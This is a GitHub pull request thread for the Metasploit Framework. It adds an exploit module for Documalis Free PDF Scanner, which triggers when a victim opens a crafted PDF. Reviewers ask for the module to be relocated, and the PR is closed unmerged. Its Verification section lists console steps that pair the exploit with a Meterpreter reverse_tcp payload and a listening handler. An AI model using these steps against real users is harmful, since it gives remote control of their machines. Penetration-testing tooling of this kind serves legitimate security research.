Added exploit module exploit/windows/fileformat/
rapid7/metasploit-framework pull request #13506
Opened 2020-05-22 15:54 UTC by metacom27

Vulnerable Application
open PDF file and the vulnerability is triggered.

Targets
Win 7 and Win 10

Verification
use exploit/windows/fileformat/documalis_free_pdf_scanner.rb
set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host)
run
---------------------------------------------------
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (IP of Local Host) 
run

Download
http://documalis.com/free-pdf-editor
http://documalis.com/free-pdf-scanner

2020-05-24 16:55 UTC, wvu requested changes
These modules are still in the wrong location, and the PR title is incomplete. Please fix! Thanks.

2020-05-24 18:32 UTC, metacom27 commented
> These modules are still in the wrong location

I do not understand what you mean please help me.

Regards

2020-05-24 20:05 UTC, bcoles commented
> 
> 
> > These modules are still in the wrong location
> 
> I do not understand what you mean please help me.
> 
> Regards

The modules are in the repository root directory. They should be in the `modules/exploits/windows/fileformat` directory.

2020-05-25 08:35 UTC, closed without merging

2020-05-25 22:05 UTC, bcoles commented
#13517